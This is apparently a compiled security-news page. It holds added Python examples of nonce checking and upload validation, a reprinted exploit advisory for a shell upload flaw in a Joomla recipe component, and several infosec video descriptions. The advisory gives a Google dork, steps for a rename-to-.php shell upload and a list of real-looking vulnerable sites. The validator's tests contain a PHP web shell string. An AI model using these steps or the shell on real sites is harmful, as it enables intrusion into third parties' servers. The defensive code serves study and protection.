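What the missing nonce check looks like when it is present, as an added example; this is not the plugin's code and not WordPress core, but a simplified model of the scheme behind wp_create_nonce/wp_verify_nonce (an HMAC over a time tick, the action name and the user id, accepted for the current tick and the one before). Assumptions: a server-side secret (constant SECRET_KEY, constructed), the action name "devformatter-options" and the field name "_wpnonce" (both chosen for the example), and a settings handler that receives the POST body as a dict. The cross-site form in the advisory cannot carry a valid nonce, because the attacker's page has no way to compute the HMAC for the victim's user id.

```python
import hashlib
import hmac
import time

SECRET_KEY = b"constructed-per-site-secret"   # assumption: site-specific, kept server-side
NONCE_LIFE = 24 * 60 * 60                     # seconds; valid in this tick and the previous one
ACTION = "devformatter-options"               # chosen for the example
FIELD = "_wpnonce"                            # chosen for the example


def _tick(now):
    # Half-life ticks: a nonce issued late in one tick is still accepted
    # during the next one, so a form left open for a while still submits.
    return int(now // (NONCE_LIFE / 2))


def _hash(tick, action, user_id):
    msg = ("%d|%s|%d" % (tick, action, user_id)).encode()
    return hmac.new(SECRET_KEY, msg, hashlib.sha256).hexdigest()[:10]


def create_nonce(action, user_id, now=None):
    """Token to embed in the settings form as a hidden field."""
    now = time.time() if now is None else now
    return _hash(_tick(now), action, user_id)


def verify_nonce(nonce, action, user_id, now=None):
    """True only for a token minted for this action and this user in the
    current or previous tick. Constant-time comparison."""
    now = time.time() if now is None else now
    t = _tick(now)
    for tick in (t, t - 1):
        if hmac.compare_digest(str(nonce), _hash(tick, action, user_id)):
            return True
    return False


def save_settings(post, user_id, now=None):
    """Settings handler in the shape the advisory says is missing: the nonce
    is checked before any option is written. Returns the options that would
    be stored, or None when the request is refused."""
    if not verify_nonce(post.get(FIELD, ""), ACTION, user_id, now):
        return None   # a cross-site form lands here
    # The real plugin would sanitize and store the options at this point;
    # note that the nonce stops the forged write, it does not make the
    # stored values safe to render (the advisory's persistent XSS).
    return {k: v for k, v in post.items() if k != FIELD}


if __name__ == "__main__":
    token = create_nonce(ACTION, user_id=7)
    print("legitimate form:", save_settings({FIELD: token, "usedevformat": "on"}, 7))
    print("attacker's form:", save_settings({"usedevformat": "on"}, 7))
```

Binding the token to the user id is what makes a nonce useless to an attacker even if one leaks from a different user's page; binding it to the action keeps a nonce for one form from authorizing another.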
  19. Joomla GarysCookBook version 3.0.x suffers from a remote shell upload vulnerability.

Inj3ct0r >> Exploit database separated by exploit type (local, remote, DoS, etc.)
[+] Site : 1337day.com
[+] Support e-mail : submit[at]1337day.com

#########################################
I'm KedAns-Dz member from Inj3ct0r Team
#########################################

###
# Title : Joomla Component (GarysCookBook v3.0.x) File Upload Vulnerability
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com .net .org
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# TwiTter : @kedans
# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
# Type : proof of concept - webapp 0day - remote - php
# Tested on : Windows7
# Vendor : [http://www.garyscookbook.de/]
###
# <3 <3 Greetings t0 Palestine <3 <3
# F-ck HaCking, Lov3 Explo8ting !

######## [ Proof / Exploit ] ################|=>

#! Google Dork :
#+ allinurl:option=com_garyscookbook

#+ http://[target]/[path]/index.php?option=com_garyscookbook -> try add (&func=newItem)
#+ http://[target]/[path]/index.php?option=com_garyscookbook&func=newItem

#! Upload Shell .gif and post the newItem
#+ Use TamperData to change the shell to .php

## DeMo's :
http://www.perinat.fr/index.php?option=com_garyscookbook&func=newItem
http://thetexcritter.com/index.php?option=com_garyscookbook&func=newItem
http://www.lejardindagnes.fr/index.php/index.php?option=com_garyscookbook&func=newItem
http://lacarline.org/index.php?option=com_garyscookbook&func=newItem
http://www.jannonce-enligne.com/index.php?option=com_garyscookbook&func=newItem

!+ Find More targets in Google

#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem
# Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
# Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * B.N.T * All Security and Exploits Webs
#============================================================================================================

Source: PacketStorm
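The step "upload a .gif, then change it to .php with TamperData" works only because the component trusts the filename and type the browser sends. The server-side check below is an added example, not GarysCookBook's or Joomla's code, written to show what a validator has to look at so that the rename trick fails: it decides on the bytes received (allowlisted extension, the magic bytes that extension must carry, no script markers inside an "image"), refuses double extensions, and never reuses the client's filename. The allowlist, marker list and the hypothetical upload_dir are assumptions for the example.

```python
import os
import secrets

# Allowed upload types and the leading bytes a genuine file of that type carries
# (assumption: a recipe component only needs a few image types).
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}
# Sequences that have no business inside an image. A file carrying them is a
# polyglot waiting for the moment it is served under a script extension.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%")


def check_upload(filename, data):
    """Decide on the bytes received, never on the client's claimed name or
    Content-Type (those are exactly what TamperData edits).
    Returns 'ok' or the reason the upload is refused."""
    base = os.path.basename(filename).lower()
    parts = base.split(".")
    if len(parts) != 2 or not parts[0] or not parts[1]:
        return "bad-name"          # no extension, or shell.php.gif style double extension
    ext = parts[1]
    if ext not in MAGIC:
        return "bad-extension"     # .php, .phtml, .pht, ... are never accepted
    if not data.startswith(MAGIC[ext]):
        return "bad-magic"         # a PHP shell renamed to .gif has no GIF header
    if any(marker in data.lower() for marker in SCRIPT_MARKERS):
        return "embedded-script"   # GIF89a<?php ... ?> polyglot
    return "ok"


def stored_name(filename):
    """Server-chosen name: random, with the extension from the allowlist
    rather than echoed from the client. Even a bypass of the checks above
    then lands on a name the attacker cannot predict or choose."""
    ext = os.path.basename(filename).lower().rsplit(".", 1)[-1]
    return secrets.token_hex(8) + "." + ext


def handle_upload(filename, data, upload_dir="/var/www/uploads"):
    """Return (path the accepted file would be written to, verdict); the
    upload_dir is hypothetical and nothing is written here."""
    verdict = check_upload(filename, data)
    if verdict != "ok":
        return None, verdict
    return os.path.join(upload_dir, stored_name(filename)), "ok"


if __name__ == "__main__":
    shell = b"<?php system($_GET['c']); ?>"          # constructed payload
    for name, body in [("recipe.gif", b"GIF89a" + b"\x00" * 16),
                       ("shell.php", shell),
                       ("shell.gif", shell),
                       ("shell.php.gif", b"GIF89a" + shell),
                       ("shell.gif", b"GIF89a" + shell)]:
        print(name, "->", handle_upload(name, body)[1])
```

The order of the checks matters: the extension allowlist alone is what the advisory defeats (the browser-side rename), the magic-byte check alone is defeated by prepending "GIF89a" to the shell, and only the combination plus a server-chosen name closes the path from "upload" to "execute".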
  20. Description: Welcome to the first of many Kippo Kronicles. These are videos of attacks against my honeypot. To learn more about Kippo and other IT Security stuff go to TekDefense - News. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: The Kippo Kronicles - Ep1
  21. Description: In this video I will show you how to dump the wireless key and password from a Windows machine. This is a post-exploitation demo: first I will exploit a Windows system, then use the post-exploitation module for wireless keys. If there are more than 2-3 keys stored you will get the entire key in XML format with the plain text password. I have used this module before but at that time this module was not giving the plain text password; now it is working well and is a useful module. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Post -- Exploitation -- Dump Wireless Password In Plain Text
  22. Description: Speakers: ADITYA K. SOOD SECURITY PRACTITIONER - ISEC PARTNERS | PHD CANDIDATE MSU RICHARD J. ENBODY ASSOCIATE PROFESSOR, DEP'T OF COMPUTER SCIENCE AND ENGINEERING AT MICHIGAN STATE UNIVERSITY Botnet designs are becoming more robust and sophisticated with the passage of time. While the security world is grappling with the security threats posed by Zeus and SpyEye, a new breed of botnets has begun to flourish. Present-day botnets such as smoke, ICE-X, NGR, etc use a mix of pre-existing and newly developed exploitation tactics to disseminate infections. Botnets have been successful in bypassing advanced defense mechanisms developed by the industry. This talk will take you on a journey through the lives of present-day botnets. With a good set of demonstrations, we will dissect the crux of the upcoming breed of botnets. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Botnets Die Hard - Owned And Operated
  23. Description: If there's one thing we know, it's that we're doing it wrong. Sacred cows make the best hamburgers, so in this year's talk I'm going to play with some techniques that are obviously wrong and evil and naive. There will also be a lot of very interesting code, spanning the range from high speed network stacks to random number engines to a much deeper analysis of non-neutral networks. Finally, we will revisit DNSSEC, both in code, and in what it can mean to change the battleground in your favor. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Black Ops
  24. Description: In this video I will show you how to use the Volatility Process Memory and Kernel Memory and Objects plugins; I will cover how to dump a process exe and kernel memory.

Plugins used:
• Process Memory
  o memmap
  o memdump
  o procmemdump
  o procexedump
  o vadwalk
  o vadtree
  o vadinfo
  o vaddump
• Kernel Memory and Objects
  o modules
  o modscan
  o moddump
  o ssdt
  o driverscan
  o filescan
  o mutantscan
  o symlinkscan
  o thrdscan

Process Memory
memmap - For a brief inspection of the addressable memory pages in a process
memdump - To extract all data from the various memory segments in a process and dump them to a single file
procmemdump - To dump a process's executable (including the slack space), use the procmemdump command.
procexedump - To dump a process's executable
vadwalk - To briefly inspect a process's VAD nodes
vadtree - To display the VAD nodes in a visual tree form
vadinfo - The vadinfo command displays extended information about a process's VAD nodes
vaddump - To extract the data contained within each VAD segment

Kernel Memory and Objects
modules - To view the list of kernel drivers loaded on the system
modscan - To scan physical memory for kernel modules, use the modscan command
moddump - To extract a kernel driver to a file
ssdt - To list the functions in the Native and GUI SSDTs
driverscan - To scan for DRIVER_OBJECTs in physical memory
filescan - To scan physical memory for FILE_OBJECTs
mutantscan - To scan physical memory for KMUTANT objects
symlinkscan - This plugin scans for symbolic link objects and outputs their information.
thrdscan - To scan for ETHREAD objects in physical memory

Source : CommandReference - volatility - Example usage cases and output for Volatility 2.0 commands - An advanced memory forensics framework - Google Project Hosting

Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.

Original Source: Source: Volatility Process Memory - Kernel Memory And Objects Usage